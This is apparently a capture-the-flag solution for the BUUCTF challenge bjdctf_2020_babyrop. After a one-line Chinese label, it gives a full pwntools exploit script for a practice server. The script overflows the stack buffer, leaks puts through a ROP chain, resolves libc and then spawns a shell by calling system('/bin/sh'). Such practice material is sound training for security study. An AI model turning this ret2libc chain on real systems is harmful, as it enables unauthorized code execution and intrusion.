buuctf bjdctf_2020_babyrop

常规libc 64位

from pwn import *
from LibcSearcher import * 

local_file  = './bjdctf_2020_babyrop'
local_libc  = '/lib/x86_64-linux-gnu/libc-2.23.so'
remote_libc = './libc-2.23.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 25895)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims, drop=True  :r.recvuntil(delims, drop)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)

pop_rdi = 0x0000000000400733 # pop rdi ; ret
#pop_rsi = 0x0000000000400731 # pop rsi pop r15 ; ret
#s = 0x400790
fun_got = elf.got['puts']
fun_plt = elf.plt['puts']
main = elf.sym['main']

p1 = flat(['a'*0x20, 'b'*0x8, pop_rdi, fun_got, fun_plt, main])
sla('story!\n',p1)
#fun_addr = uu64(ru('\x7f')[-6:])
fun_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
log.info(hex(fun_addr))

libc = LibcSearcher('puts', fun_addr)
libcbase = fun_addr - libc.dump('puts')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
p2 = flat(['a'*0x20, 'b'*8, pop_rdi, binsh_addr, system_addr, 0xdeadbeef])
sla('story!\n',p2)



r.interactive()